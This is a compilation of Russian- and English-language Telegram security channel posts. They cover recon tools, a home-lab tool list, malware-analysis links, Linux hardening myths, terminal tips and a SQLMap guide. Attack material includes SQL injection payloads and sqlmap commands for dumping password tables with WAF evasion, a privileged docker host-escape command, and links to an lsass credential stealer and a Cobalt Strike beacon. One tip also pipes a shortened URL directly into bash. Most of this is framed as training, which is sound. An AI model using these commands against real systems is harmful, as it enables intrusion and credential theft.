All Security Engineering Courses

#ad #collector ADWSDomainDump - инструмент для дампа инфы об AD через протокол ADWS. Позволяет извлекать данные и генерировать вывод в формате ldapdomaindump поверх легитимного HTTP-based протокола Использование:

adwsdomaindump -u 'thewoods.local\mathijs.verschuuren' -p 'password' -n 10.10.10.1 dc01.thewoods.local
[*] Connecting to ADWS host...
[+] ADWS port 9389 is reachable
[*] Binding to ADWS host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

https://github.com/mverschu/adwsdomaindump Чат в МАХ Канал в МАХ Telegram ✉️ @freedomfox

Subfinder — самый быстрый passive DNS resolver. Находит поддомены из 30+ источников без единого DNS запроса к цели. Что использует:

🔵 Passive sources (VirusTotal, CRT.sh, CertSpotter) 🔵 AlienVault OTX, ThreatCrowd, Recon.dev 🔵 FindDomain, Crobat, Turbodork 🔵 Rate limit evasion и concurrency 🔵 JSON/YAML/TXT вывод

Установка:

# Linux/macOS
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

# Docker
docker run -it projectdiscovery/subfinder -d target.com

Использование:

subfinder -d target.com -all -o results.txt
subfinder -d target.com -silent -t 100
subfinder -d target.com -o results.txt -json
subfinder -d *.target.com -r resolvers.txt

Пример вывода:

mail.target.com
api.target.com
dev.target.com
staging.target.com
cdn.target.com
*.wildcard.target.com

👽 CodeGuard: SciencePop | Чат

Build Your Own Professional Cybersecurity Lab at Home (100% Legal & Free) Designed for learners and professionals pursuing Bug Bounty • Ethical Hacking • SOC Analysis • Penetration Testing Core Lab Components Kali Linux — Primary attack & testing operating system https://www.kali.org/get-kali Metasploitable 2 — Safe environment for exploit practice https://sourceforge.net/projects/metasploitable Vulnerable-AD — Hands-on Active Directory attack scenarios https://github.com/WazeHell/vulnerable-AD WebGoat — Learn web vulnerabilities interactively https://owasp.org/www-project-webgoat OWASP Juice Shop — Modern SQL injection, XSS, and logic flaw practice https://owasp.org/www-project-juice-shop GoPhish — Ethical phishing simulations https://getgophish.com PortSwigger Web Security Labs — Structured web hacking labs https://portswigger.net/web-security Vulnserver — Buffer overflow exploitation training https://github.com/stephenbradshaw/vulnserver Vulnerable WordPress — WordPress exploitation practice https://github.com/wpscanteam/VulnerableWordpress CTFlearn — Capture-the-Flag challenges (Beginner → Advanced) https://ctflearn.com pfSense — Network segmentation & firewalling https://pfsense.org/download Suricata — Intrusion detection & prevention https://docs.suricata.io Wazuh — SIEM & log analysis https://wazuh.com/install OpenSearch — Dashboards & security analytics https://opensearch.org Security Onion — Blue-team monitoring platform https://securityonionsolutions.com/software Cowrie — Attack interaction & logging https://github.com/cowrie/cowrie WireGuard — Secure remote lab access https://www.wireguard.com/install Sysmon — Advanced Windows event logging https://learn.microsoft.com/sysinternals/downloads/sysmon Ansible — Lab deployment & orchestration https://ansible.com/resources/get-started MITRE Caldera — Simulated real-world attacks https://caldera.mitre.org Wireshark — Deep traffic inspection https://wireshark.org/download.html Zeek — Network security monitoring https://zeek.org/get-zeek REMnux — Reverse engineering environment https://remnux.org Sigma — Threat detection rule writing https://sigmahq.io Skills You’ll Develop Real-world attack methodology Exploitation and bug bounty techniques SOC detection and threat analysis Network forensics and malware investigation Build it once. Practice daily. Master both red and blue team operations from your own home lab.

Name : Mr. Robot SEASON : 4 Language : Eng Quality : 720p @HD_Web_Series_collection_2

Name : Mr. Robot SEASON : 3 Language : Hindi, Eng Quality : 720p Total Episode : 10 @HD_Web_Series_collection_2

Name : Mr. Robot SEASON : 2 Language : Hindi, Eng Quality : 720p Total Episode : 12 @HD_Web_Series_collection_2

Name : Mr. Robot SEASON : 1 Language : Hindi, Eng Quality : 720p Total Episode : 10

#Malware_analysis 1⃣ Netdragon Botnet https://blog.xlab.qianxin.com/netdragon/ 2⃣ Spying Chrome Extensions https://qcontinuum.substack.com/p/spying-chrome-extensions-287-extensions-495 3⃣ AgreeToSteal: The First Malicious Outlook Add-In https://www.koi.ai/blog/agreetosteal-the-first-malicious-outlook-add-in-leads-to-4-000-stolen-credentials 4⃣ OysterLoader - Multi-Stage Evasion Loader https://blog.sekoia.io/oysterloader-unmasked-the-multi-stage-evasion-loader 5⃣ RenEngine Malware https://securelist.com/renengine-campaign-with-hijackloader-lumma-and-acr-stealer/118891 6⃣ Foxveil Malware Loader https://www.catonetworks.com/blog/cato-ctrl-foxveil-new-malware

CobaltStrike-Linux-Beacon https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon

Morpheus is an lsass stealer that extracts lsass.exe in RAM and exfiltrates it via forged and crypted NTP packets. For authorized testing only! https://github.com/Aur3ns/lsassStealer #статьи_ссылки_scripts

7 главных хаков для терминала, которые разгонят твою работу в N раз 🔥 Большинство юзеров тормозят в консоли, потому что не знают базовых фишек. Тратим часы на тупой поиск и рутину, когда всё можно сделать в три команды. Вот что реально ускорит твою работу сегодня. 1️⃣ Магия автодополнения и истории (используй это, дурак)

# Ищешь старую команду? Не надо листать!
Ctrl + R - ищешь по истории
# Напечатал 'git comm' и жмешь:
Tab Tab - показывает все варианты

# История с временными метками:
export HISTTIMEFORMAT="%d/%m/%y %T "
# Увеличиваем размер истории до чертиков:
export HISTSIZE=10000
export HISTFILESIZE=20000

Фикс для ленивых:

# Впиши в ~/.bashrc:
bind '"\e[A": history-search-backward'
bind '"\e[B": history-search-forward'
alias h='history | grep'

# Перезагрузи:
source ~/.bashrc

2️⃣ Быстрая навигация (cd - это прошлый век)

# Вместо cd ../../../
alias ..='cd ..'
alias ...='cd ../..'
alias ....='cd ../../..'

# Bookmarks - сохраняй частые пути:
export MARKPATH=$HOME/.marks
alias jump="cd -P"
mark() { mkdir -p "$MARKPATH"; ln -s "$(pwd)" "$MARKPATH/$1"; }
unmark() { rm -i "$MARKPATH/$1"; }

3️⃣ Поиск файлов за секунды (find - это слишком медленно)

# Установи fd - он быстрее в 10 раз:
sudo apt install fd-find  # или brew install fd
alias find='fdfind'  # для Ubuntu

# Примеры:
fd .txt$ ~/projects  # все txt файлы
fd -e py -x wc -l    # посчитать строки во всех .py

# А для поиска в файлах - ripgrep:
sudo apt install ripgrep
rg "TODO" --type py  # все TODO в python файлах

4️⃣ Автоматизация рутины (не повторяй одно и то же)

# Вместо длинных команд - алиасы:
alias ll='ls -lah'
alias gs='git status'
alias gc='git commit -m'
alias gp='git push'
alias dps='docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}"'

# Свои функции в .bashrc:
mkcd() { mkdir -p "$1" && cd "$1"; }
cl() { cd "$1" && ls -la; }

5️⃣ Работа с процессами на лету (не открывай htop каждый раз)

# Быстрый поиск и убийство:
pkill -f "python script"  # убить по имени
pgrep -l chrome           # найти PID

# Мониторинг без установки:
watch -n 2 'free -h'      # обновлять каждые 2 сек
while true; do clear; df -h; sleep 5; done

6️⃣ Терминальные мультиплексоры (один экран - 10 окон)

# tmux базовые команды:
tmux new -s work        # новая сессия
Ctrl+b %                # разделить окно по вертикали
Ctrl+b "                # разделить по горизонтали
Ctrl+b [номер панели]   # переключение
tmux attach -t work     # вернуться к сессии

# Если лень учить tmux - screen:
screen -S session_name
Ctrl+a c                # новое окно
Ctrl+a n                # следующее окно

7️⃣ Кастомизация под себя (терминал должен быть удобным)

# Цветной вывод для ls:
export LS_COLORS='di=1;35:ln=1;36:so=1;32:pi=1;33:ex=1;31:'
alias ls='ls --color=auto'

# Показ git branch в промпте:
parse_git_branch() {
    git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/ (\1)/'
}
export PS1="\u@\h \W\[\033[32m\]\$(parse_git_branch)\[\033[00m\] $ "

Бонус: мой .bashrc для копирования

# Быстрая загрузка настроек:
curl -s https://gist.githubusercontent.com/user/123/raw/.bashrc >> ~/.bashrc
source ~/.bashrc

# Или сразу всё вместе:
wget -O - https://bit.ly/term-setup | bash

Важный факт: Профессионалы тратят 80% времени на настройку окружения и 20% на работу. Ленивые - наоборот. 👩‍💻 CodeGuard: Linux | Чат

Небольшая шпаргалка для DevOps"а 👩‍💻 CodeGuard: Linux | Чат

10 мифов о Linux, которые портят всем жизнь Linux - не серебряная пуля. Его тоже можно поставить криво, настроить как попало и удивляться, почему все лезут без спроса. Вот главные заблуждения, из-за которых горят сервера. 1️⃣ "Linux безопасен по умолчанию" Реальность: Свежая установка Ubuntu/Debian с открытым SSH на 22 порту и разрешённым рутовым логином по паролю - это подарок хакерам.

# Проверь себя:
sudo grep "^PermitRootLogin\|^PasswordAuthentication" /etc/ssh/sshd_config

2️⃣ "Контейнеры Docker изолируют всё" Реальность: Запуск контейнера от root без кап-дропов и не-привилегированного режима = дать ключи от хоста.

docker run --privileged -v /:/mnt alpine sh  # Теперь ты root на всей системе

3️⃣ "Брандмауэр не нужен, у меня нет открытых портов" Реальность: ss -tuln покажет обратное. MySQL на 0.0.0.0:3306? Redis на всех интерфейсах? Добро пожаловать.

sudo ss -tulpn | grep -E ':(3306|6379|5432)'

4️⃣ "Апдейты можно ставить раз в год" Реальность: Устаревшие пакеты - это уже не фичи, а дыры. apt list --upgradable - это список твоих проблем.

sudo apt list --upgradable 2>/dev/null | grep -v "^Listing" | wc -l

5️⃣ "SUID-бинарники - это нормально" Реальность: Любой левый бинарь с SUID-флагом может стать трояном. GTFOBins - библия для эксплуатации.

find / -perm -4000 -type f 2>/dev/null | grep -v "^/usr/bin"

6️⃣ "Логи сами всё запишут" Реальность: По умолчанию LogLevel в SSH - INFO. Проваленные логины могут и не попасть в /var/log/auth.log.

sudo grep "LogLevel" /etc/ssh/sshd_config

7️⃣ "В Cron можно писать любые скрипты" Реальность: Мировые права на файл крон-задачи (o+w) позволяют любому пользователю системы её подменить.

find /etc/cron* -perm -o+w -type f 2>/dev/null

8️⃣ "SELinux/AppArmor только мешают" Реальность: Это последний серьёзный барьер после взлома приложения. Выключил - упростил жизнь атакующему.

sudo sestatus 2>/dev/null || aa-status 2>/dev/null || echo "Ничего не включено"

9️⃣ "Пароли в переменных окружения безопасны" Реальность: Любой процесс, запущенный от того же пользователя, может их прочитать. ps auxfww покажет все секреты.

ps auxfww | grep -E "(API_KEY|SECRET|PASSWORD)"

1️⃣0️⃣ "Мой VPS никто не найдёт" Реальность: Shodan, Censys и прочие сканеры постоянно обшаривают весь интернет. Твой IP с портом 22 уже в базе.

# Попробуй найти себя:
curl -s "https://api.shodan.io/shodan/host/search?key=YOUR_KEY&query=port:22+os:linux" | jq .

Быстрая проверка на идиотизм:

#!/bin/bash
echo "[?] Проверяем стандартные косяки..."
echo "SSH на 22 порту?"
sudo netstat -tlnp | grep ":22 "
echo "Рут по SSH разрешён?"
sudo grep "PermitRootLogin yes" /etc/ssh/sshd_config
echo "Открытые порты для всех?"
sudo ss -tuln | grep "0.0.0.0:" | grep -v ":22"
echo "Готово. Если что-то выше есть - ты в группе риска."

Итог: 95% взломов происходят из-за человеческого фактора и веры в мифы, а не из-за нуледей в ядре. Безопасность - это процесс, а не галочка. 👩‍💻 CodeGuard: Linux | Чат

SQL Injection через SQLMap: Полный гайд от скана до дампа 🧨 Веб-приложение принимает твои запросы? А если вместо id=1 вставить id=1' UNION SELECT username,password FROM users-- — получишь админку? SQLMap делает это за тебя: находит, эксплуатирует, дампит всё. 1️⃣В чём суть SQLMap автоматически ищет SQL-инъекции всех типов (boolean-based, error-based, time-based, UNION) и извлекает данные из любой БД. 2️⃣Полная практика

# 1. Базовый скан формы
sqlmap -u "http://target.com/login.php" --forms --batch

# 2. Сканируем GET-параметр
sqlmap -u "http://target.com/news.php?id=1" --dbs --batch

# 3. Дамп конкретной БД
sqlmap -u "http://target.com/news.php?id=1" -D "webapp_db" --tables

# 4. Выгружаем таблицу users
sqlmap -u "http://target.com/news.php?id=1" -D "webapp_db" -T "users" --dump --threads=10

# 5. Только пароли (колонка password)
sqlmap -u "http://target.com/news.php?id=1" -D "webapp_db" -T "users" -C "password" --dump

Флаг --batch отвечает YES на все вопросы автоматически.

3️⃣Выводы SQLMap в реале

[INFO] the back-end DBMS is MySQL
[INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql  
[*] webapp_db ← Вот наша цель!

4️⃣Продвинутые фишки

# Обход WAF
sqlmap -u URL --tamper=space2comment,charencode

# Time-based инъекция (если нет ошибок)
sqlmap -u URL --technique=T --time-sec=5

# Туннелирование через SSH
sqlmap -u URL --proxy=socks5://127.0.0.1:1080

5️⃣Нюансы

🔸Только свои стенды или письменное разрешение! 🔸 --level=5 --risk=3 — максимальная агрессивность 🔸 Логгируй: sqlmap -u URL --output-dir=./sqlmap_logs 🔸 WAF блокирует? Меняй User-Agent и tamper-скрипты

🧠 Где тренироваться: DVWA, bWAPP, Metasploitable, HackTheBox Полезно? ❤️ - Да 👍 - Нет 😈 CodeGuard: CyberSec Edition | Чат